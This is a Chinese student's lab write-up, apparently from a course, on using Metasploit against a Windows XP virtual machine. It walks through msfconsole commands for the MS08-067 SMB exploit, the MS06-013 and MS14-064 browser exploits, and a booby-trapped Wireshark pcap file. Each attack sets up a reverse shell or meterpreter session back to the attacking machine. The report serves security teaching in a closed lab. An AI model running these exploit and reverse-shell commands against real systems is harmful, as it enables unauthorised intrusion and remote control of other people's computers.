首页 > 其他分享 >Exp6 MSF应用基础-20201324

Exp6 MSF应用基础-20201324

时间:2023-05-04 20:23:33浏览次数:54  
标签:set 攻击 Exp6 漏洞 exploit windows MSF 靶机 20201324

目录

1 实践内容

1.0 安装靶机

下载和安装windows xp,配置共享文件夹,关闭防火墙

用windows xp作为靶机,kali作为攻击机

查看IP地址

互ping可通

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

主动攻击实践MS08-067

攻击者试探靶机是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.137.130

存在漏洞信息。

查看靶机目标端口是否开启

msfconsole
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.137.130
exploit

端口默认为445,已打开

msfconsole
//查找该漏洞使用的攻击模块
search ms08_067
use exploit/windows/smb/ms08_067_netapi		//选择使用的渗透模块
set payload generic/shell_reverse_tcp	   //使用的payload
show options	//查看需要设置的参数
set RHOSTS 192.168.137.130
set LPORT 1324
set LHOST 192.168.137.142
set target 0
exploit 	//侦听

成功获得了Windows xp的shell,运行ipconfig命令发现ip地址一致。攻击成功

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.2.1 针对浏览器的攻击ms06_013_createtextrange

设计攻击模块及参数

use exploit/windows/browser/ms06_013_createtextrange //选择使用exploit漏洞
set payload windows/meterpreter/reverse_tcp  //选择payload
show options //查看所需调的参数
exploit   //开始攻击

获得url,并在windows xp中用IE浏览器打开

浏览器开始从0-100计时。最终停在100

但是没能建立连接,于是又试了另一种攻击

1.2.2 针对浏览器的攻击MS14-064

msfconsole
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
show payloads //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp 
set SRVHOST 192.168.137.142 //设置攻击机IP
set AllowPowerShellPrompt 1 //因为msf中自带的漏洞利用exp调用的是powershell,所以msf中的exp代码只对安装powershell的系统生效
set LPORT 1324
set LHOST 192.168.137.142
set target 0 //设置winXP靶机
exploit

把生成的URL地址复制进Windows XP的浏览器中,在kali中可以看到成功建立了一个会话。

ctrl+c退出当前状态,输入sessions -i 1获取第一个会话连接,并输入ipconfig验证靶机地址

验证成功,攻击机成功获取靶机shell

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

利用wireshark_mpeg_overflow攻击Windows XP

use exploit/windows/fileformat/wireshark_packet_dect
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.137.142
set LPORT 1324
set FILENAME 1324xy.pcap
exploit
cp -r "/root/.msf4/local/1324xy.pcap" "/home/20201324/Desktop/"

生成1324xy.pcap文件,移动到桌面

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.142
set LPORT 1324
exploit

将文件1324xy.pcap在xp中用wireshark打开

但回连没有成功。攻击机一直在等待靶机触发条件,但感觉触发条件并不是打开文件,应该还需要其他操作。

1.4 成功应用任何一个辅助模块

ipidseq

msfconsole
use auxiliary/scanner/ip/ipidseq
set RHOSTS 192.168.137.130
set TIMEOUT 3 //设置时间最长扫描时间
exploit

我们只要将IP设成范围就可以扫描同一网段下的其他主机了

当我们知道靶机IP所在范围时,可以扫描出靶机的具体地址。

2 基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit:放入恶意代码,进行安全漏洞对靶机进行一些非授权操作的过程

payload:载荷。也就是一段shellcode攻击代码,在利用漏洞对靶机进行一系列操作的过程中,实质上进行执行shellcode代码。

encode:编码。通过改变shellcode的编码格式来对攻击代码进行伪装,使其能正常运行并尽量免杀。

3 实践总结与体会

做的时候只是盘了一下各个命令之间的逻辑,大概明白每一步是做什么,达到什么样的效果。但这条命令为什么能起到这样的效果,我并没有从原理上理解 所以这次验收不会考这个吧 。另一方面,我觉得漏洞挖掘的触发条件比较苛刻,我做针对浏览器的攻击时采用了两种方式,一种做出了一种没做出来,但其实二者思路是基本一致的。包括后面的尝试,可能只是靶机少点了一个键,攻击就不能成功。那实战中每一步都恰好碰对的几率能有多大呢?目前觉得还是太巧合了

4 离实战还缺些什么技术或步骤

缺少独立发现新漏洞的能力。本次实验中使用的漏洞利用方法都是已经被总结和公开的,而且也只能在xp这种低版本上才能复现。随着操作系统版本一次次迭代,以及前人多年耕耘,发现漏洞应该越来越困难,而且常规方法可能也不再适用。现在的信息安全人员需要掌握新的技术和工具,以及创新更高级的思路才行

标签:set,攻击,Exp6,漏洞,exploit,windows,MSF,靶机,20201324
From: https://www.cnblogs.com/cqszxy2020/p/17372390.html

相关文章

  • MSF专题(3)
    metsvc后门使用如下命令runmetsvc然后重启之后,通过bind_tcp进行主动连接。由于版本问题,在win732位上,相应的服务起不来,不做过多介绍。......
  • Exp5 信息搜集与漏洞扫描-20201324
    目录1各种搜索技巧的应用1.1搜索网址目录结构dir_listingbrute_dirs1.2利用搜索引擎的技巧普通检索采用字段设置1.3路由侦查2DNSIP注册信息的查询2.1whois查询2.2nslookup查询2.3dig域名查询2.4IP2Location地理位置查询2.5IP2反域名查询3基本的扫描技术:主机发现、端口......
  • msf
    MSF——基本使用和Exploit模块(一)–走看看(zoukankan.com)1、介绍matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。msfconsole2、永恒之蓝永恒之蓝2017年4月4日黑客团体Brokeers影子经纪人网络攻......
  • msf帮助文档
    1、介绍msf启动后,以交互式窗口命令进行工作。通过help命令查看帮助文档:help2、核心命令3、模块命令4、任务命令5、资源脚本命令6、数据库后端命令7、认证后端命令8、发展命令 ......
  • MSF实战免杀过静态:ShellCode加花指令
    分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中......
  • PentestLab-web安全SQL注入-EXP6
    我们打开靶机,选择“SQL Injections”选择“Example6”观察页面我们使用工具测试参数为-u"http://192.168.29.148/sqli/example6.php?id=2"--dumpall开始测试没有发现我......
  • msfconsole入门
    jpg改pdf本文我们简单的来学习,msfconsole在实际的渗透测试中长应用的手段和方法。以及msf在后渗透阶段的使用。注意本文所讲到的技术仅在本地靶场环境运行,同时本文的......
  • MSF练习 - 永恒之蓝
    永恒之蓝漏洞利用一、启动MSFmsfconsole┌──(root㉿kali)-[~]└─#msfconsole                          ......
  • 记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网
    前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境......
  • msfvenom常用payload命令
    windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-......